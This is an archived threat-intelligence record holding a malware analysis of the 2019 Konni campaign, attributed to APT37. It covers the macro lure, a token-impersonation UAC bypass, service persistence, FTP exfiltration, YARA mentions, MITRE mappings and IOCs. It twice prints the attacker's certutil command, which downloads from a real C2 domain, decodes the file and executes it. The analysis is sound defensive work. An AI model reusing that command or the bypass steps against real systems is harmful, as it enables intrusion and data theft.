{ "id": "97497158-831e-41be-800f-9552308d216e", "created_at": "2026-04-29T08:22:17.483133Z", "updated_at": "2026-04-29T10:42:22.317963Z", "deleted_at": null, "sha1_hash": "e82d84cd510e127ea76cb153a175d44ad12d761f", "title": "A Look Into Konni 2019 Campaign", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 4644739, "plain_text": "A Look Into Konni 2019 Campaign\r\nBy Doron Karmi\r\nPublished: 2020-01-08 · Archived: 2026-04-29 07:00:53 UTC\r\n11 min read\r\nJan 4, 2020\r\nKonni is a remote administration tool, observed in the wild since early 2014. The Konni malware family is\r\npotentially linked to APT37, a North-Korean cyber espionage group active since 2012. The group primary victims\r\nare South-Korean political organizations, as well as Japan, Vietnam, Russia, Nepal, China, India, Romania,\r\nKuwait, and other parts of the Middle East.\r\nPress enter or click to view image in full size\r\nMap chart of APT37 main targets\r\nThe latest activities leveraging the Konni malware family potentially target political organizations and politically\r\nmotivated victims in Russia and South-Korea. During my research, I observed 3 distinct campaigns throughout\r\n2019: starting from January to late September.\r\nKonni Infection chain consists of multiple stages and utilizes living-off-the-land binaries in its operation from the\r\nuse of certutil.exe to download additional files and decode their content to sc.exe and reg.exe for persistence.\r\nThese campaigns leverage similar C2 infrastructure for the delivery and a specific free FTP service used for\r\nexfiltration the stolen data from the affected targets. Additionally, the macro-armed lure documents used to deliver\r\nand install the Konni payloads have similarities across all 3 campaigns.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 1 of 24\n\nKonni is a modular malware that collects reconnaissance data on the target machine prior to sending further\r\nmodules to the victim. We were unable to find additional operations related to the Konni malware family that\r\nmight reveals further capabilities and malware types used by the group associated with Konni activity.\r\nDuring our analysis I found overlapping between the Konni infection chain, tools and technique used by the\r\nSyscon backdoor [1] using a service called COMSysApp to load the payload as a service DLL as a mean to\r\nachieve persistence on the victim machine. Although similarities have been observed between Konni and Syscon,\r\nat this time we can’t say with full certainty that the same threat actor is behind both operations.\r\nCampaign Timeline\r\nPress enter or click to view image in full size\r\nExecution flow\r\nPress enter or click to view image in full size\r\nTypical Konni Execution Flow\r\nKonni Multi-Stage Operation\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 2 of 24\n\nStage 1 — Initial Execution\r\nIn mid-July 2019 I encountered with an emerging campaign delivering the Konni malware.\r\nThe threat actor behind the campaign leveraged a malicious macro-armed Microsoft Word document titled: “О\r\nситуации на Корейском полуострове и перспективах диалога между США и КНДР” (translated to: About the\r\nsituation on the Korean Peninsula and the prospect of a dialogue between the United States and the DPRK).\r\nUnlike the previously observed campaign, the August campaign potentially targeting Russian language speakers\r\nwith an interest in Korean Geo-political situation, the lure document used in this campaign is written Cyrillic and\r\ncontains content related to North Korean American foreign affairs.\r\nPress enter or click to view image in full size\r\nDecoy document for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726\r\nWhen analyzing the document, we see that the internal codepage of the lure document is 949 — ANSI/OEM\r\nKorean (Unified Hangul Code). indicating that the actor who created the document used Korean keyboard layout.\r\nThis is an indication that the author is a Korean native speaker.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 3 of 24\n\nDocument Properties. Codepage 949 is windows Korean (Unified Hangul Code)\r\nThe lure document contains VBA macro code with the following capabilities:\r\nChanges the font color from light grey to black — to trick the victim to enable content.\r\nChecks if windows is a 32 or 64 bit version.\r\nConstructs and executes the command-line to download additional files\r\nPress enter or click to view image in full size\r\nMacro code for 4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726\r\nThe document contains 3 hidden text boxes. Each text box has a hexadecimal string constructed to a command\r\nthat is executed once the document is opened by the victim.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 4 of 24\n\nPress enter or click to view image in full size\r\nFull Command Line example: c:\\windows\\system32\\cmd.exe /q /c copy /y %windir%\\system32\\certutil.exe\r\n%temp%\\mx.exe \u0026\u0026 cd /d %temp% \u0026\u0026 mx -urlcache -split -f http://handicap[.]eu5.org/1.txt \u0026\u0026 mx -decode -f\r\n1.txt 1.bat \u0026\u0026 del /f /q 1.txt \u0026\u0026 1.bat\r\nCertutil is a living-off the land command line utility that can be used to obtain certificate authority information\r\nand configure certificate services. Threat actors usually utilize certutil to download remote files from a given\r\nURL. It also incorporates a built-in function to decode base64-encoded files.\r\nCMD silently copies certutil.exe into temp directory and rename it to “mx.exe” in an attempt to evade detection\r\nand then downloads 1.txt from from a remote resource: http://handicap.eu5[.]org. The text file contains a base64\r\nencoded string that is decoded by certutil and saved as 1.bat.\r\nThe threat actor removes tracks by silently deleting 1.txt from the temp directory and then executes 1.bat.\r\nPress enter or click to view image in full size\r\nKonni Initial Execution\r\nStage 2 — Privilege Escalation\r\nThe batch script acts as a second stage downloader and downloads two additional files, depending on the system\r\narchitecture. Certutil is executed to download a txt file and decode its content. Decoding each base64 string (32-\r\nbit or 64-bit version) results in a cabinet file — setup.cab\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 5 of 24\n\n1.bat: downloads next stager\r\nThe content of the cabinet file is then extracted into %temp% folder, and setup.cab file is deleted from the system.\r\nsetup.cab files\r\nInstall.bat — acts as installer to ensure persistence and execute mshlpsrvc.dll.\r\nmshlpweb.dll — acts as loader; responsible to elevate privileges.\r\nmshlpsrvc.dll — final payload; responsible for data exfiltration.\r\nmshlpsrvc.ini — configuration file; contains URL used by mshlpsrvc.dll\r\nBoth dropped DLL files are unsigned and packed with UPX packer.\r\nPress enter or click to view image in full size\r\nDLL file is unsigned \u0026 UPX strings indicate file is packed\r\nTo check level of permissions, the threat actor uses net.exe. if the current user has high privileges, install.bat is\r\nexecuted directly. Otherwise, mshlpweb.dll is executed using rundll32.exe.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 6 of 24\n\n1.bat: Checks for user’s permission\r\nmshlpweb.dll is a loader that uses a known token impersonation technique to elevate permissions and execute\r\ninstall.bat with high privileges. To gain higher privileges mshlpweb.dll execute the Windows Update Standalone\r\nInstaller, wusa.exe. This process runs as a high-integrity process by default, since its set to auto-elevate within its\r\nmanifest.\r\nPress enter or click to view image in full size\r\nwusa.exe manifest, autoElevate set to true\r\nmshlpweb.dll contains an access token impersonation routine that duplicates the token of the high integrity\r\ninstance of wusa.exe, and uses it to create a new cmd.exe process running under the security context of the\r\nimpersonated user[2], which in turn execute the installer — install.bat.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 7 of 24\n\nPress enter or click to view image in full size\r\nwusa.exe runs with high integrity\r\nToken Impersonation Routine\r\nmshlpweb.dll utilize a set of standard windows API calls to duplicate the token of wusa.exe and use it to spawn\r\nhigh integrity instance of cmd.exe. Higher privileges are needed to execute the installer, install.bat. The technique\r\nused by the threat actor is a full fileless UAC bypass named “Cavalry” that was leaked back in March 2017 to\r\nWikiLeaks as part of “Vault 7”, a series of leaks on the US CIA that included sophisticated privilege escalation\r\ntechniques used by several actors in the wild since the leakage [3]. This technique also bypasses UAC with the\r\n“AlwaysNotify” settings.\r\nTechnique flow:\r\nwusa.exe is executed in hidden window using ShellExecuteExW;\r\nHandle to the access token associated with wusa.exe is created.\r\nThe token object of wusa.exe is duplicated using DuplicateTokenEx. The threat actor pass\r\n“Token_all_access” as desired access, which combines all possible access rights for a token and creates a\r\nnew impersonation token.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 8 of 24\n\nNew SID with medium privileges is created and set with NtSetInformationToken to the new duplicated\r\ntoken to lower its mandatory integrity level.\r\nRestricted token is then created and duplicated using NtFilterToken and DuplicateTokenEx respectively.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 9 of 24\n\nThe new duplicated token is passed to ImpersonateLoggedOnUser.\r\nAn elevated cmd instance is spawned using CreateProcessWithLogonW function. The credentials passed as\r\narguments to the function (Username: aaa, Domain: bbb, Password: ccc) are identical to the credentials\r\nspecified in the UAC bypass implementation by FuzzySecurity, UAC-TokenMagic [4]\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 10 of 24\n\nI used the James Forshaw’s excellent blog [6] explaining in detail how to bypass UAC using the technique above.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 11 of 24\n\nKonni 2nd stage and privilege escalation flow\r\nStage 3 — Persistence\r\nWhen the installer is executed, it first stops COMSysApp, a service that manages the configuration and tracking of\r\nComponent Object Model (COM)-based components, using sc.exe utility.\r\nCOMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe.\r\nCOMSysApp service is added under the “SvcHost” key as a preliminary step to its execution in the context\r\nof svchost.exe.\r\nThe malicious DLL is added as a service DLL of COMSysApp.\r\nCOMSysApp service is restarted.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 12 of 24\n\nInstall.bat: Persistence \u0026 Execution of mshlpsrvc.dll\r\nOnce COMSysApp service is restarted the malware is loaded in memory, and the batch file is removed from the\r\ninfected system. The final payload (mshlpsrvc.dll), and its configuration file (mshlpsrvc.ini) are both copied into\r\nthe system32 directory from the temp directory and then deleted.\r\nInstall.bat: files copied to System32 directory\r\nmshlpsrvc.dll Execution and Persistence flow\r\nStage 4 — Data Reconnaissance and Exfiltration\r\nAfter ComSysApp service is restarted, a new instance of svchost.exe is spawned and loads the final payload\r\nmshlpsrvc.dll. mshlpsrvc.ini is a configuration file that was delivered together with mshlpsrv.dll in earlier stage of\r\nthe attack. This file contains a Base64-encoded string with a custom key, the file is read and decoded by\r\nmshlpsrvc.dll to perform an outbound connection and download handicap[.]eu5[.]org/4.txt.\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 13 of 24\n\nPress enter or click to view image in full size\r\nThe Custom Base64 key used to decode mshlpsrvc.ini content\r\nData Reconnaissance\r\nPrior to execution of any recon command to gather information from the target machine, the default codepage of\r\nthe console is changed to “65001” (utf-8)\r\ncmd /c REG ADD HKCU\\Console /v CodePage /t REG_DWORD /d 65001 /f\r\nGet Doron Karmi’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThe following information is gathered from the affected machine and sent back to the control server:\r\nSystem info using: cmd /c systeminfo \u003e%temp%\\temp.ini\r\nList of running process using: cmd /c tasklist \u003e%temp%\\temp.ini\r\nThe temp.ini file is then compressed into a cabinet file and saved to C:\\Windows\\TEMP: cmd /c makecab\r\n“C:\\Windows\\TEMP\\temp.ini” “C:\\Windows\\TEMP\\temp.cab”\r\nThe downloaded file, 4.txt, contains a base64 encoded string with the same custom key as used before. Following\r\ndecoding, the file content appears to be the FTP credentials for the FTP service that acts as the command \u0026\r\ncontrol server for this attack. We’ve observed similar past campaigns where free FTP services were used as the C2\r\nfor other Konni and Syscon variants, staring from October 2017. [5]\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 14 of 24\n\nFTP credentials for C2 server\r\nExfiltration\r\nThe data is exfiltrated in the following way:\r\nThe temp.cab is base64 encoded with the same custom key used earlier.\r\nEncoded temp.cab is copied to a post.txt under the directory C:\\Windows\\TEMP.\r\nfiles uploaded to the control server using “stor” command.\r\nPress enter or click to view image in full size\r\nFTP Session — login to the C2 FTP server and data exfiltration\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 15 of 24\n\nData Reconnaissance and Exfiltration flow\r\n2019 Outbursts — Konni Campaigns\r\nDuring my research, I have observed 3 additional outbursts on 2019: 2 similar samples observed on January 2019,\r\nand another one on September 2019.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 16 of 24\n\n2019 Konni Outbursts\r\nMonitoring the Konni family samples, and the techniques used in the various campaigns throughout the year\r\nallowed me to track the malware evolution and changes made by the APT, but also to find many similarities\r\nincorporated in every Konni campaign.\r\nHash Comparison\r\nImphash (for “import hash”) is a unique hash value assign to PE files based on the import table of the file. The\r\nhash is calculated by the library and API function names and their order within the executable. This is an efficient\r\nway of pivoting on malicious executable files that share a similar payload are most likely created by the same\r\ngroup.\r\nPress enter or click to view image in full size\r\nThe compiler’s linker builds the Import Address Table (IAT) based on the specific order of functions within the\r\nsource file, same Imphash value indicates that the PE IAT table includes the same functions and in the same order.\r\nThis is a strong evidence that ties together different payloads from different campaigns to the same threat actor.\r\nDoc Properties Comparison\r\nAll lure documents associated with Konni activities are written in Cyrillic, and potentially target political\r\norganizations and politically motivated victims in Russia. Notwithstanding, we found that all 3 documents files’\r\ninternal codepage is set to 949 — ANSI/OEM Korean (Unified Hangul Code).\r\nPress enter or click to view image in full size\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 17 of 24\n\nMacro Comparison\r\nThe lure document is armed with a VBA macro that essentially comprise the command line to be executed. The\r\nfinal command line that is composed by the macro is identical across all 3 campaigns expect of the C2 URL,\r\nwhere the next stager is downloaded from. In our example from the July campaign the final command line is:\r\nc:\\windows\\system32\\cmd.exe /q /c copy /y %windir%\\system32\\certutil.exe %temp%\\mx.exe \u0026\u0026 cd /d %temp%\r\n\u0026\u0026 mx -urlcache -split -f http://handicap.eu5[.]org/1.txt \u0026\u0026 mx -decode -f 1.txt 1.bat \u0026\u0026 del /f /q 1.txt \u0026\u0026 1.bat\r\nBelow you can see the evolution and changes made in the macro code level throughout the Konni attacks; one\r\nnotable change is the switch to hidden text boxes within the document that contain the hex representation of the\r\ncommands instead using it directly in the macro.\r\nPress enter or click to view image in full size\r\nDecoding Routine\r\nKonni malware family use a custom base64 key to encode the content of several files in the exfiltration phase. We\r\nobserved the same flow of data reconnaissance and exfiltration across all campaigns:\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 18 of 24\n\nTypical Konni Data Reconnaissance and Exfiltration\r\nAlso, the decoding routine is identical across all Konni samples we have analyzed which indicate a code reuse by\r\nthe threat actor.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 19 of 24\n\nKonni Decoding Routine\r\nHunting for Konni\r\nThe YARA rules below were used to find additional samples of the Konni malware known in the wild. It is a\r\ncombination of unique strings of the macro within the lure documents, unique strings and win API calls from the\r\npayload and unique opcode sequence taken from the decoding routine shared among all samples.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 20 of 24\n\nYARA Rule: Lure Doc\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 21 of 24\n\nYARA Rule: Konni Payload\r\nCheck my YARA github page to test out the YARA rules I used to hunt for Konni samples.\r\nMITRE ATT\u0026CK Techniques\r\nExecution\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 22 of 24\n\nT1059-Command-Line Interface\r\nT1129-Execution through Module Load\r\nT1085-Rundll32\r\nPersistence\r\nT1031-Modify Existing Service\r\nT1050-New Service\r\nPrivilege Escalation\r\nT1134-Access Token Manipulation\r\nT1050-New Service\r\nDefense Evasion\r\nT1134-Access Token Manipulation\r\nT1088-Bypass User Account Control\r\nT1140-Deobfuscate/Decode Files or Information\r\nT1112-Modify Registry\r\nT1085-Rundll32\r\nDiscovery\r\nT1057-Process Discovery\r\nT1082-System Information Discovery\r\nExfiltration\r\nT1048-Exfiltration Over Alternative Protocol\r\nT1132-Data Encoding\r\nIOCs\r\nLure Documents\r\n8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd\r\n4c201f9949804e90f94fe91882cb8aad3e7daf496a7f4e792b9c7fed95ab0726\r\ned63e84985e1af9c4764e6b6ca513ec1c16840fb2534b86f95e31801468be67a\r\nKonni Loader\r\n6a22db7df237c085855deb48686217173dc2664f4b927ebe238d4442b68a2fd3\r\n2ab1b28bae24217e8b6dd0cd30bb7258fa34c0d7337ecfea55e4310d08aeb1e6\r\nKonni final payload\r\ne94fa697d8661d79260edf17c0a519fae4b2a64037aa79b29d6631205995fdad\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 23 of 24\n\n6256ba2b89c78877328cc70d45db980310a51545a83d1d922d64048b57d6c057\r\n52ba17b90244a46e0ef2a653452b26bcb94f0a03b999c343301fef4e3c1ec5d2\r\n7d2b1af486610a45f78a573af9a9ad00414680ff8e958cfb5437a1b140acb60c\r\nceb8093507911939a17c6c7b39475f5d4db70a9ed3b85ef34ff5e6372b20a73e\r\n8795b2756efa32d5101a8d38ea27fca9c8c7ed1d54da98f0520f72706d1c5105\r\n7f6984fa9d0bbc1bd6ab531f0a8c2f4beb15de30f2b20054d3980395d77665af\r\n290c942da70c68d28a387775fbb7e6cab6749547d278cb755b4999e0fe61a09f\r\n274e706809a1c0363f78363d0c6a7d256be5be11039de14f617265e01d550a98\r\nIP Addresses\r\n69.197.143.12\r\n185.27.134.11\r\n88.99.13.69\r\n162.253.155.226\r\nDomains\r\nclean.1apps[.]com\r\nhandicap. eu5[.]org\r\npanda2019.eu5[.]org\r\nftpupload[.]net\r\nSource: https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nhttps://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b\r\nPage 24 of 24", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b" ], "report_names": [ "a-look-into-konni-2019-campaign-b45a0f321e9b" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-29T10:39:54.780383Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "aa65d2c9-a9d7-4bf9-9d56-c8de16eee5f4", "created_at": "2025-08-07T02:03:25.096857Z", "updated_at": "2026-04-29T10:39:54.670197Z", "deleted_at": null, "main_name": "NICKEL JUNIPER", "aliases": [ "Konni", "OSMIUM ", "Opal Sleet " ], "source_name": "Secureworks:NICKEL JUNIPER", "tools": [ "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-29T10:39:53.647929Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "OSMIUM", "Konni", "Vedalia" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-29T10:39:54.776396Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-29T10:39:53.154905Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "ATK4", "InkySquid", "ScarCruft", "Venus 121", "G0067", "APT 37", "Operation Daybreak", "Reaper Group", "Ricochet Chollima", "APT-C-28", "Moldy Pisces", "Group 123", "Group123", "Operation Erebus", "Red Eyes" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1777450937, "ts_updated_at": 1777459342, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e82d84cd510e127ea76cb153a175d44ad12d761f.pdf", "text": "https://archive.orkl.eu/e82d84cd510e127ea76cb153a175d44ad12d761f.txt", "img": "https://archive.orkl.eu/e82d84cd510e127ea76cb153a175d44ad12d761f.jpg" } }